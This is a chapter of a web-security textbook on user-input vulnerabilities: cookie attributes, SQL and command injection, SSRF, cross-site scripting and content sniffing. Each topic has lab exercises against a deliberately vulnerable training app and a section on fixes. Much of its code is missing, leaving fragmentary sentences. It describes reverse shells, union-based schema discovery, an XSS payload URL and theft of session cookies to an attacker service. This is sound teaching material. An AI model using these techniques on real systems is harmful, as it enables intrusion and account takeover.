In this chapter, we will look at one of the most common sources of vulnerabilities in a web application: user input. It can pose a threat when that input is either displayed in web pages, stored on the server, or executed.
We will begin by looking in some detail at how cookies are set by a web server and how they are used by the browser. Incorrect cookie settings are a frequent source of vulnerabilities. We will then examine some common user input-oriented vulnerabilities and how to fix them: injection, server-side request forgery, and cross-site scripting.
7.1 Types of User Input
We often think of user input as being form data that is sent to the server as a POST request, and this is often a source of vulnerabilities. However, we shall see that any data sent from the client to the server, or indeed the server to the client, can be a threat.
We saw in Chapter 1 that there are two classes of attack we must defend against: server side and client side. In server-side attacks, an attacker targets our server through a web client or some other tool. In client-side attacks, the attacker targets a user. The attacker tricks the user into performing some action, usually using tools already on their device such as their web browser. Poor handling of user input can lead to both types of attack.
Cookies
Other HTTP headers, for example, User-Agent
Form data, both interactively and programmatically submitted
JSON and XML data, for example, in REST API requests and responses
Uploads, for example, images
URLs including GET parameters and path info
While not exactly user input, JavaScript, even when sent from your own site, can pose the same threats.
We looked at JSON and XML data in the last chapter. We will look at the remainder in the sections that follow.
7.2 Cookies
Cookies are key/value pairs sent from the server to the client in a response header. The client, for example, a web browser, stores them in a file and sends them to the server in a request header if certain conditions are met.
Cookie attributes supported by the Set-Cookie header
Attribute | Meaning |
---|---|
Expires=datetime | Do not send the cookie after the given time. The value should be given as day, month year hour:min:sec TZ. |
Max-Age=secs | Do not send the cookie after the given number of seconds have elapsed. |
Domain=domain | Only send the cookie for given domains. |
Path=path | Only send the cookie for URLs under the named path (including subpaths). |
Secure | Only send the cookie over HTTPS. |
HttpOnly | Do not allow the cookie to be read by JavaScript code. |
SameSite=value | Controls how the cookie is sent in cross-site requests. Described in the following text. |
The allowable values are given in Table 7-1.
The Expires and Max-Age Attributes
The Max-Age attribute instructs the client when to stop sending the cookie, as a number of seconds from when it is received. The Expires attribute does the same thing but as an absolute time and date. The attributes are mutually exclusive: it makes little sense to send both. By default, Max-Age is 0, which means delete the cookie once the browser is closed.
Domain and Path
By default, the cookie is sent for all URLs on the host it was sent from (based on the host in the URL) and to no other hosts, also not sending it to subdomains.
If the Domain attribute is set, the cookie is sent to that domain and subdomains. For example, if Domain is set to example.com, it is sent to example.com, www.example.com, etc. If it is set to www.example.com, it is only sent to that host.
If Path is set, it is only sent for URIs under that path. For example, if Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the cookie is sent to all URIs.
The Secure and HttpOnly Attributes
The Secure flag prevents the cookie from being sent to the server when the connection is not encrypted. This is especially important when cookies contain sensitive data such as session IDs. It is important to remember, however, that the cookie is still stored unencrypted on the user’s computer.
will not display the cookie if HttpOnly was set. We will return to this later in the chapter when we talk about cross-site scripting.
The SameSite Cookie Setting
The SameSite attribute controls in what cross-site circumstances the cookie is sent.
If set to None, the cookie is always sent. However, modern versions of Chrome and Firefox will not send it at all unless the Secure flag is set and the page is loaded over HTTPS.
If set to Lax, then the cookie is not sent when following a link from another domain unless it is a top-level page load and a “safe” HTTP method (GET, HEAD, or OPTIONS). This means, for example, that the cookie would not be sent when loading a URL in an IMG tag on a different site.
The cookie SameSite attribute
Situation | None | Lax | Strict |
---|---|---|---|
Following links from the same domain | Sent | Sent | Sent |
Direct navigation | Sent | Sent | Sent |
– URL typed in an address bar | |||
– URL from an email clicked on | |||
– Link from other application | |||
Following safe top-level links from a different domain | Sent | Sent | Not Sent |
Following other links from a different domain | Sent | Not Sent | Not Sent |
The behavior when following a link in an Email when SameSite is Strict is often the source of confusion. If following a link from a nonbrowser application, such as an Email client or Word document, the cookie is sent. If using a web-based Email client, the clicking causes a cross-domain link, just like clicking a link from any other website. In this situation, the cookie is not sent.
It is important to remember that the cookie attributes are directives to the browser. The server cannot control whether the browser will honor them. A user is also free to edit the browser’s cookie file and change its attributes, and also the name and value. Application security should therefore not depend on the cookie remaining unchanged, unless it is very difficult for a user or attacker to guess or derive another value (as should be the case for session cookies, for example).
Session ID Cookies
Session ID cookies are a common way for websites to keep a user logged in between requests. As HTTP is stateless, the only way to associate a user with a request is to store something on both the client and server that can be matched against each other.
When a user sends a server a username and password, for example, through a web form, the application’s back-end code can look those up in the user table of its database (in practice, the database will probably have a hashed version of the password instead of cleartext). If they match, the server creates a token. This is the session ID and can be as simple as a random string. This session ID, the user ID, and an expiry date are stored in a table on the server, and the token is sent, with a matching expiry, as a cookie to the client.
Whenever the client sends the session ID to the server, it is matched against the session table. If there is a matching row, and the expiry date has not passed, the user ID is extracted from that row, and the user is considered logged in.
In Django, the cookie is called sessionid by default, and session table in the database is called django_session. The session ID is in the column session_key. The user ID is in the column session_data. It is serialized as JSON, signed with Django’s secret key, compressed, and Base64 encoded. The signing is to prevent the database row being tampered with, for example, assigning a different user ID to an existing session ID or creating a new session ID.
This is rarely necessary in practice as it is done by Django automatically. The user object is available as request.user in each view. If there is no session ID, or it is invalid, request.user is None.
Session IDs and the SameSite Setting
If the user follows a link from a page in coffeeshop.com to another page on the same domain, the cookie will be sent.
If the user types coffeeshop.com/someurl/ into the browser, the cookie will be sent.
If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it, the cookie will be sent.
If the user follows a link to coffeeshop.com from another site, the cookie will be sent.
In all cases, the site will receive the session ID, and the user will be considered logged in without having to enter a username and password.
If the user follows a link from a coffeeshop.com to another page on the same domain
If the user types coffeeshop.com/someurl/ into the browser
If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it
In all these cases, the user will be considered logged in. If the user visits by following a link on another site, the user will not be logged in and will be prompted for a username and password.
Finally, if SameSite is set to Strict, the cookie will only be sent if the user follows a link from a coffeeshop.com page to another page on the same domain. In all other cases, the user will have to log in again.
Setting the same site value inappropriately can lead to certain attacks such as cross-site request forgery. We will investigate these in Chapter 8.
7.3 Injection Attacks
Injection refers to vulnerabilities where a user can submit input that is executed in some way on the server. If an input field is not validated, an attacker can insert malicious code or data. Usually, the user-entered code is concatenated with code on the server, rather than being a complete command in itself.
The most well-known injection vulnerability is SQL injection. The most common source is form fields (e.g., username/password fields, search fields), but the vulnerability can exist anywhere where data is captured from the client and executed on the server in a SQL query. Other places can include GET parameters or REST API calls.
Other types of injection include command injection, where OS commands are executed (e.g., Bash commands executed through Python’s os.system() function), and code injection (e.g., executing Python code through its eval() function). Cross-site scripting, which is effectively injecting HTML and JavaScript code, is discussed in the next chapter.
7.4 SQL Injection
Here, username and password are taken from the two form input fields.
If the user enters a username and password that match an entry in the User table, a row will be returned by the SQL query, and the user will be logged in.
So long as the user bob exists, a row will be returned regardless what the password is. The attacker will be logged in.
Regardless of whether a user called anyusername exists, the or 1=1 clause will select all rows from the User table. In case multiple rows break subsequent code, the attacker adds limit 1 to restrict the output to a single row.
The semicolon ends a SQL statement and begins a new one. Not only would the attacker be logged in as the first user in the order rows are returned but would also be able to create their own user. Similarly, the attacker could delete or alter rows.
Schema Discovery
Each of the preceding examples required that the attacker know the column names in the user table, though username and password would have been obvious guesses. The last example required the attacker to know that the user table is called User. In Django, this is not the case; it is auth_user. The attacker could of course try many different names (auth_user is also a sensible guess, as many applications are built with Django). However, an attacker could also query the schema to find out what the table is called.
Clicking Search causes matches to be displayed in a page.
The union keyword joins two select queries together. The only requirement is that the number and types of the selected columns match. In the server code, two varchar columns, name and description, are selected. The attacker ensures they select two columns of type varchar.
The catalog.pg_tables table in Postgres contains the names of all the tables in the database. Fortunately, it has two useful varchar columns: schemaname and tablename.
Most likely, no results will be returned by the actual search string xxx. However, the other select statement will return all the schema and table names in the database as part of the search results.
Now the attacker does not have to know what the user table is called. They can get Postgres to tell them. They do have to know that Postgres is the database engine. They could just try the correct syntax for all popular databases—there are not that many. Alternatively, they could run nmap. Recall from Chapter 5 that nmap revealed that Postgres was running.
int
float
varchar
int, int
int, float
int, varchar
Once they find a query that works, they can run a few more: one to get the schema names, another to get the column names, and so on. This is another reason why detailed error messages should not be displayed for users—it can reveal the schema to attackers. Hiding errors may not prevent a determined attack, but the attacker will need more queries, which may be noticed when monitoring logs or traffic.
Of course our attacker would probably not enter all these queries manually. They would script them, or use an existing tool. One open source tool is sqlmap.1
Finding SQL Injection Vulnerabilities
The easiest way for an attacker to spot a SQL injection vulnerability is to enter a single quote in a form field by itself and see if an error is raised. Say the form field was a search box. If the server code is secure, entering a single quote should either return no results or return results that really did contain a single quote. If a vulnerability exists, the server would either return an error or something indicating the code failed, for example, a blank page.
Defending Against SQL Injection
may well prevent the quote deletion from succeeding. Hackers also replace a single quote with its ASCII value %27 to avoid detection.
A far safer defense is to not use string concatenation at all. Instead, use prepared statements.
Prepared statements are a feature of SQL engine APIs. Placeholders are inserted into the SQL query where user-provided data is expected. The statement is compiled, and the user input is passed as a parameter to the execution function along with the compiled SQL statement. They also improve performance, especially if the query is reused, as it only needs to be compiled once.
If the user-provided name or desc contains quotes, comment characters, semicolons, etc., they will be part of the placeholder replacement, not additional SQL query syntax.
Note that %s is the placeholder for all data types, not just strings. For example, use %s, not %d, for integers.
file inside the Coffeeshop VM.
The Coffeeshop application has a SQL vulnerability in the search function. Visit the Coffeeshop URL at
http://10.50.0.2
We will exploit the vulnerability by using the search term to display all usernames and hashed passwords from the auth_user table (columns username and password).
and press Enter. You should see usernames and passwords in the search results.
Our union has to have matching data types for the selects on either side. As the code selects an integer, two strings, and a float, we have to select the same after the union. As the auth_user table has no float columns, we select a constant value.
Press Enter to run the query. You should now be able to visit the admin page http://10.50.0.2/admin and log in as bob (his username is in coffeeshop.com/secrets/config.env).
We don’t want bob to be a superuser so reset his permissions, either with another SQL injection command or using the Admin page.
Removing the Vulnerability
to pick up the code changes. If you have errors, they will be in /var/log/apache2/error.log.
After fixing the vulnerability, confirm that a legitimate search still works and that SQL injection does not.
7.5 Command Injection
Command injection vulnerabilities are similar to SQL injection. The difference is that user-supplied text is concatenated with a shell command that is executed on the server, rather than SQL code that is executed by the database.
then the server would execute the scale command as expected but would then print out the contents of the system password file. The double ampersand is a Bash and and is an effective way of joining two commands into a single command. The hash is the comment character. If the output were captured and displayed in the response, the attacker would be able to view the system users.
This initiates a reverse shell. A normal shell session, initiated by a client connecting to a port on the server, normally gives the client an interactive session on the server. A reverse shell works in the opposite direction. The client connects to a port on the server, but the server gets an interactive session on the client. The >& redirects standard output and standard error. In normal usage, this would be to a file. However, Bash allows them to be redirected to a TCP port, as in this example. The 0>&1 redirects standard input to the same port. The result is that when Bash runs, the input and output are read from and written to the remote TCP port. The -i creates an interactive shell.
The outer Bash command is because os.system() runs its argument through /bin/sh, not Bash. TCP port redirection is not supported in /bin/sh, so we need an additional Bash command to interpret it.
Once a connection is established, the nc command simply prints anything received on the given port to the terminal and sends terminal input to the port.
When the os.system() command is executed, the Bash command is run and connects to the hacker’s open port. The hacker can type commands, and they will be executed on the remote server. The output will be sent to the Hacker’s port. As the Bash command was started by Apache, it will be running as the same user, typically www-data, with that user’s privileges.
In the last chapter, we discussed the danger of running a web server with more permissions than necessary. The consequences should now be clear. If this vulnerability exists, then www-data has write permission on the code; the attacker can change your application. The attacker can also connect to the database and run any query permitted by the web server’s database user.
Back Doors
A reverse shell is an example of a back door: an entry point an attacker uses that was not intended by the developer. In our example, the developer expects connections over HTTP and HTTPS on ports 80 and 443, but the attacker has created a Bash entry point on port 9000.
A Bash shell using nc is useful for an attacker and dangerous for the application. However, it is still rather limiting: the attacker must be present to interactively operate the shell, it only accepts one connection at a time, and file upload and download are difficult to enact.
Fortunately for attackers, other back doors exist. It is not hard to see how nc could be replaced by a more sophisticated application that spawns a new thread for each connection and that automates commands rather than requiring them to be entered interactively.
Also fortunately for attackers, tools already exist with more features. Metasploit2 is a popular framework with many exploits built in and is also extensible. Metasploit contains exploits and payloads. Exploits are modules that take advantage of a vulnerability. One example is Metasploit’s web_delivery exploit, which takes advantage of a vulnerable web form.
Once the exploit has been executed, Metasploit delivers a payload. The user can select from a number that are supported by each exploit. A Bash reverse shell over TCP (such as the one we showed in our example) is one option, but Metasploit makes an additional 20 available for the web_delivery exploit.
Metasploit also has staged payloads. These are delivered in parts. Once the exploit is executed, Meterpreter delivers a small payload whose purpose is to download a larger one with more features. The python/meterpreter/reverse_tcp payload in Metasploit has, for example, file upload and download commands.
Defending Against Command Injection
Firstly, system commands should be used very sparingly. If developing an application in Python, use Python commands and packages wherever possible, rather than making system calls.
This syntax is more secure because the scale variable (with % appended to it) is always treated as a single command-line argument. Adding spaces, semicolons, ampersands, and comment character will only ever add them to the argument, not create additional arguments or commands.
You should avoid this as it is as insecure as os.system().
The Coffeeshop application has a command injection vulnerability in the contact form. Visit the Coffeeshop URL at
http://10.50.0.2
and click Contact in the menu bar at the top. You will have to log in if you have not done so already.
and you should see your message.
Take a look at the code in the contact() function in views.py to see how this works. Execute the code by sending the email.
End the shell session with Ctrl-C. Note that, because the Bash session is interactive, the web page will not finish loading until you quit the reverse shell.
The solution to this exercise is in coffeeshop/vagrant/snippets/injection.txt.
Combining SQL and Command Injection
The previous example required a command injection vulnerability to be present. If there isn’t one, a reverse shell can sometimes be obtained through SQL injection. Many databases, Postgres included, allow shell commands to be executed from SQL queries. In Postgres, this is disabled by default except for superusers (which is another reason for your web application not to use a superuser account to access the database).
For clarity, we have split the command onto several lines. In a real attack, it would be entered without the carriage returns.
The COPY … FROM PROGRAM … command is Postgres’ syntax for running a shell command. The output is copied into a table. Of course, we need a table to copy it into, so we create the table first.
For our reverse shell, we are not interested in the output, so we don’t care if we can read the table or not (though we can with further SQL injection commands). We just want the command to be run so that it connects to our nc server.
Clearly, allowing the web application’s database user to run shell commands is dangerous, and this feature should be disabled in all but very specialist applications.
7.6 Server-Side Request Forgery
This is one of the more well-known web vulnerabilities in cross-site request forgery (CSRF), which we will discuss in detail in Chapter 8. Server-side request forgery (SSRF) is a relatively new attack and, despite its similar name, has less in common with cross-site request forgery and more with injection attacks.
SSRF vulnerabilities occur when a request is made by a client to a server that contains another request embedded in it, or enough of a request fragment that an attacker, by crafting a suitable request, can make a request the developer did not intend to make available. It is made possible because it is being called from within the server’s network, not from the outside Internet.
Since the embedded call is made from within the intranet, port 9000 on localhost is not blocked. If the administrators assumed that only authorized users have access to this port and therefore do not protect it with a username and password, the attacker can gain access without needing to authenticate.
This may sound like a rather obvious vulnerability, yet it exists in the real world. One existed in GitLab until June 2021 when it was patched.3 An embedded URL similar to the preceding situation was made available to integrate GitHub projects with GitLab. The vulnerability arose because attackers, even unauthenticated ones, could use the API call to make calls to other hosts internal to the network where the GitLab instance was running.
Defending Against Server-Side Request Forgery
The best defense against SSRF is to not make requests based on the contents of client-supplied requests, at least not without first sanitizing the request. If you must make this functionality available, ensure the host, port, protocol, and path match some criteria.
7.7 Cross-Site Scripting (XSS)
- 1.
Reflected XSS, where JavaScript code is transient rather than being stored on the server
- 2.
Stored XSS, where the JavaScript is stored on the server
- 3.
DOM-based XSS where only the DOM environment is changed rather than actually changing code
There is also Blind XSS, where JavaScript code is executed in a context that does not update the screen, for example, an asynchronous request. It is similar to Stored XSS except for being more difficult to test for.
An attacker’s aim might be to have the code executed in their own browser, but more commonly the aim is to have it executed in a victim’s browser.
XSS vulnerabilities are attractive to attackers because the JavaScript code is run in the context of the vulnerable site and is run by the victim on their own browser.
Reflected XSS
Then, when the search results are displayed, the page will contain the JavaScript, enclosed in legal HTML <script> … </script> tags, and would therefore be executed.
This is an example of Reflected XSS. The JavaScript is not stored on the server but is sent to the browser in the response and executed there.
The code is only executed in the attacker’s browser. Other users do not receive the code. This may still have a harmful impact if the developer assumed certain JavaScript code would or would not be executed. For example, client-side form validation.
However, if this is the goal of the attacker, there is an easier way to have JavaScript code executed in their browser: by editing the HTTP response before it reaches the browser. We will do this in the next exercise.
If you followed the setup instructions in Chapter 2, you should have HTTP Toolkit installed. We will use this to intercept and alter requests from our Coffeeshop application.
Click on the + Add a new rule to rewrite requests or responses button. In the Match drop-down, select Any requests, and in the Then drop-down, select Pause the response to manually edit it.
Under Any requests, you will see another drop-down titled Add another matcher and a Plus button. Click the drop-down and select For a URL. Enter our Coffeeshop application root URL underneath, http://10.50.2/. Your window should look like Figure 7-1. Now click on the Plus button to save the matcher and then the Save button to save the rule.
You can now close HTTP Toolkit. It will also close the Chrome window.
Hackers are less interested in their own cookies than in other people’s and so are more likely to try to get JavaScript code executed by a victim’s browser, not their own.
One way would be to send a victim a link to a page with a reflected XSS vulnerability, crafting the link to contain malicious JavaScript. The Coffeeshop application has a vulnerable page to display a product, using the URL
http://10.50.0.2/prod/?id= extsl{productid}
If the URL is called with a valid product ID, for example:
http://10.50.0.2/prod/?id=1
then the product is displayed. If an invalid one is provided, it displays an error message stating that the requested ID was not found. Since the user input is displayed unchanged, setting it to a script, for example:
http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E
to be pasted into the page and executed. If this is emailed to a victim, it will be executed in their browser. You can try this on your Coffeeshop instance and verify that it works.
Another way to get someone else to execute your JavaScript is to get it stored on the server. This is where Stored XSS comes in.
Stored XSS
Sometimes, user input is persisted in an application’s database and then displayed in HTML pages. Examples include social media posts, blog posts, product reviews, and so on. If an attacker can get malicious JavaScript code stored there, it will be executed whenever another user visits the page that displays that input. It will be executed as that user, with that user’s cookies.
Our Coffeeshop application has one such vulnerability, in a form where users can leave comments about products. We will exploit this in the next exercise.
Visit the Coffeeshop application at http://10.50.0.2 in Chrome. Log in as bob (see the file coffeeshop/secrets/config.env for the password). Now click on any of the products to see the details page.
Now reload the page. You will see the alert pop up with your session ID and the CSRF cookie. If you log out and log in again as the alice, then her cookies will be displayed.
Showing a user their own cookie is not much of a risk. An attacker prefers to have the cookie sent to them. One option is for the attacker to create a web service with a GET URL that saves cookies passed in the URL. They simply create a comment with some JavaScript to call this URL using the document.cookie value. Whenever a user views that comment, the URL will be called, sending their cookies to the attacker.
Take a look at the code in the views.py file for CSThirdparty. The function is called cookies() and is quite simple.
There are other approaches, but this one is short and synchronous, avoiding potential issues such as short comment fields in the database.
The code for this exercise is in coffeeshop/vagrant/snippets/xss.txt.
with the cookies in document.cookie.
By entering a real comment in addition to the script, no one looking at the HTML will know their cookies have been stolen.
Exploiting the Stolen Cookie
substituting the session ID value from the cookie you saved in the CSThirdparty database.
Now refresh the page and close the Developer Tools. You should find that you are now logged in as bob.
To clean up, delete the comment again. You can also delete the cookies from the database.
DOM-Based XSS
Dom-based XSS vulnerabilities occur when an attacker can submit JavaScript (through GET parameters, form input, etc.) that is used when modifying the DOM programmatically, for example, using innerHTML.
Here, errorText is the text coming from the URL.
If the server does not sanitize the user-submitted text and an attacker includes JavaScript code inside a <script> tag, that JavaScript code will be executed when added to the DOM.
A page like this might exist in an application where there is no server-side rendering. It therefore relies on JavaScript to customize the contents.
Defending Against Cross-Site Scripting
Each of the XSS examples relies on user-submitted code being interpreted at HTML. The best defense is to ensure that it isn’t—remove or escape any HTML special characters such as < and >, &, etc.
This is not as easy as it might first appear. Like escaping URL-encoded input, there are several common mistakes that hackers know and can exploit. The best strategy is to use a well-established third-party library to do the escaping. Django has one built in.
The braces {{ ... }} are Django’s syntax for variable substitution, so this is printing the comment of comment.comment.
By default, Django will escape this. We appended safe to indicate that we want Django to treat the variable as safe text and not to perform escaping. Variables with user input, as in this case, should definitely not be treated as safe, unless it has been escaped previously in back-end code.
There are additional defenses that specifically relate to session IDs (and CSRF cookies, which we will look at in the next chapter). Session IDs need special defenses because they contain sensitive information. As we saw in the last exercise, they perform the same function as a username and password and should therefore be treated as securely. The difference is they are designed to be disposable—we can invalidate a user session by deleting the server-side entry for that ID, and the only inconvenience is that the user will have to log in again.
We saw in Section 7.2 that we can place limitations on how a cookie is used when we send it to the client. The session-grabbing attack in the last exercise would have been prevented if we had set the HttpOnly parameter in the cookie. It would then be inaccessible to JavaScript. Other cookies would be sent to the attacker, but not the cookies created with HttpOnly.
And of course no cookies would be sent at all if we had escaped the HTML.
Django’s session cookie security variables
Variable | Meaning | Default |
---|---|---|
SESSION_COOKIE_AGE | Set the Max-Age parameter | 1209600 (2 weeks) |
SESSION_COOKIE_DOMAIN | Set the domain the cookie will be sent for | None |
SESSION_COOKIE_HTTPONLY | Set the HttpOnly flag (don’t make the cookie available in JavaScript) | True |
SESSION_COOKIE_PATH | Set the path the cookie will be sent for | / |
SESSION_COOKIE_SAMESITE | Set the cookie’s SameSite value | Lax |
SESSION_COOKIE_SECURE | Set the cookie’s Secure flag (only send over HTTPS) | False |
Looking at this table, it is clear that by default, the session ID should not have been sent by the malicious JavaScript. It was because we have overridden SESSION_COOKIE_HTTPONLY in our settings.py.
Click on the delete icon next to 10.50.0.2. Visit or reload
http://10.50.0.2
- 1.
Change the session cookie settings in settings.py.
- 2.
Ensure that comment text is properly escaped in product.html.
Restart Apache with sudo apachectl restart, log in as bob again, and create a new comment with the alert() to display the cookie (see the exercise “Exploiting a Stored XSS Vulnerability”) with the JavaScript code, reload and confirm the cookie is not displayed.
Note that the CSRF token cookie will still be displayed as this setting applies to the session ID cookie only.
Restart Apache again with sudo apachectl restart, recreate the comment, reload, and confirm the JavaScript is not executed.
The solution to this exercise is in coffeeshop/vagrant/snippets/xss.txt.
HTML Injection
Before leaving XSS, we should discuss the related vulnerability of HTML injection. This occurs when an attacker can get HTML code interpreted as part of a page. We include it here rather than in the section on injection as it arises from the same vulnerability. The difference between this and Stored XSS is that the injected text is HTML not JavaScript.
Even without JavaScript code, HTML injection can be harmful. An attacker can deface a site by adding images with IMG tags or entire pages with <iframe> tags. They can create links that can be used to track visitors or deliver malware.
Defending against HTML injection is the same as against XSS—sanitize user input.
7.8 Content Sniffing
We looked at potential vulnerabilities of file uploading in Chapter 5. Among the defenses, we said developers should confirm that the file type matches what is expected.
It is possible for a file to simultaneously be valid syntax for more than one file type. These are called polyglot files. They can potentially be useful to attackers because of a feature in browsers that causes them to change the content type from what was given in the server’s HTTP response.
Consider the following example. An attacker wants to upload malicious JavaScript to a site. The only opportunity to get code onto the server is an image upload form (e.g., on a social media site). Perhaps the site filters JavaScript uploads using Content Security Policy (CSP), which we will discuss in Chapter 8.
The attacker constructs a file containing the malicious JavaScript that is also a valid JPEG file, calling it myimage.jpg. They then upload it using the image upload form. The server checks the content and confirms it is a JPEG file.
Most web servers derive the Content-Type header from the file extension. When the client requests myimage.jpg, the server looks at the extension and sends the image with Content-Type: image/jpeg. The script should fail to execute.
However, many browsers try to be clever and assume the server has made an error. The browser is expecting application/javascript but receives image/jpeg. Believing the server may have sent the wrong content type, it inspects the file to check if it is actually JavaScript. As the image is both valid JPEG and JavaScript, the browser will decide it is actually a script and will execute it.
This is a somewhat esoteric vulnerability, but it can be demonstrated to be exploitable. Gareth Heyes at PortSwigger demonstrated that he can create a file that is simultaneously valid JPEG and JavaScript.4 We have extended this idea to create a script that can join (more or less) arbitrary JPEG images and JavaScript files into one file, which is valid syntax for both.
If you look at your coffeeshop Git clone, you will see a directory called other/jpgjs containing this script along with an example. The JPEG/JavaScript file is hackedimage.jpg. It is a valid image of a Swiss mountain. It is also JavaScript that displays a message in an alert window.
Open the index.html file in Firefox. The image will be displayed, and the alert will pop up. Both come from the same file. It works in older versions of Chrome though not in the most recent ones.
which instructs the browser not to perform this content inspection. It can be added to all responses.
In Django, the nosniff header is enabled and disabled with the SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True by default, adding the preceding header to all responses.
7.9 Summary
Code that handles user input is a common source of vulnerabilities in web applications. We saw that it gives attackers the opportunity to have their own code executed on the server or by victims’ browsers.
We looked at how cookies work and how to set their parameters safely, for example, by giving appropriate values to the SameSite parameter.
We examined user input–oriented vulnerabilities and how to secure code against them.
Injection attacks exploit vulnerable user input–handling code. SQL injection attacks work by getting attacker’s SQL code executed on the database through unsanitized input fields. Command injection attacks are similar, but the attacker’s input is executed as shell commands on the server. Code injection attacks seek to get code executed, for example, Python. We saw that input sanitization is the best defense against injection.
Server-side request forgery is an attack where a hacker can embed their request inside an API and use it to execute commands behind the server’s firewall.
We also looked at a client-side attack: cross-site scripting. In these attackers, a hacker aims to get their JavaScript code executed in a victim’s browser. The best defenses are sanitizing user input and safe use of cookie settings such as the SameSite parameter.
We ended the chapter by looking at how browser’s content sniffing feature can be exploited.
In the next chapter, we look at cross-site requests: how to allow our server to access other sites without introducing vulnerabilities.